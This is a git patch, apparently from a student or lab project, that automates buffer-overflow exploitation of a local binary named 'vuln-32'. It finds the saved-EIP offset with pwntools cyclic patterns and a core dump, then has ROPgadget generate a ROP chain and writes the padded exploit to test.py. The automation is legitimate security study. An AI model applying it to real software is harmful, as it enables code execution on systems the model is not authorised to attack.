From 688bb5a1be088385b75179c7edf48968187ee354 Mon Sep 17 00:00:00 2001 From: Liam Dalgarno Date: Wed, 25 Nov 2020 15:38:08 +0000 Subject: [PATCH] Run ROPGadget with auto offset Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com> Co-authored-by: jack bond-preston --- init.sh | 1 + offset.py | 43 ++++++++++++++++++++++++++++++------------- 2 files changed, 31 insertions(+), 13 deletions(-) diff --git a/init.sh b/init.sh index 793e8c0..66066a7 100644 --- a/init.sh +++ b/init.sh @@ -9,6 +9,7 @@ sudo apt-get --quiet --assume-yes install gcc-multilib sudo apt-get --quiet --assume-yes install zsh sudo apt-get --assume-yes --quiet install python3 python3-pip python3-dev git libssl-dev libffi-dev +sudo apt-get --assume-yes --quiet install python python3 -m pip install --upgrade pip python3 -m pip install --upgrade pwntools diff --git a/offset.py b/offset.py index 75e8781..f727cfb 100644 --- a/offset.py +++ b/offset.py @@ -2,26 +2,43 @@ from pwnlib.elf.corefile import Coredump from pwnlib.util.cyclic import cyclic, cyclic_find from pwnlib.util.packing import pack from pwnlib.tubes.process import process + import os +import subprocess -# TODO: command line arguments -input_file = "input.txt" exec_name = "./vuln-32" -core_file = "./core" -os.remove(core_file) +def find_offset(exec_name): + # TODO: command line arguments + input_file = "input.txt" + core_file = "./core" -# TODO Loop until a crash, increase payload size each iteration -with open(input_file, "wb") as f: - payload = cyclic(512) - f.write(payload) + os.remove(core_file) -process([exec_name, input_file]).wait() + # TODO Loop until a crash, increase payload size each iteration + with open(input_file, "wb") as f: + payload = cyclic(512) + f.write(payload) -core = Coredump('./core') + process([exec_name, input_file]).wait() -assert pack(core.eip) in payload + core = Coredump('./core') -print(cyclic_find(core.eip)) + assert pack(core.eip) in payload -os.remove(input_file) + os.remove(input_file) + + return cyclic_find(core.eip) + +offset = find_offset(exec_name) + +# print("\t# Padding goes here") <-- search for this +# print("\tp = ''\n") + +result = subprocess.run(["ROPgadget", "--binary", exec_name, "--ropchain"], stdout=subprocess.PIPE) +stdout = result.stdout + + +stdout = stdout.replace(b"p = ''\n", b"p = \"" + bytes('a' * offset, 'ascii') + b"\"\n") +with open("test.py", "wb") as f: + f.write(stdout)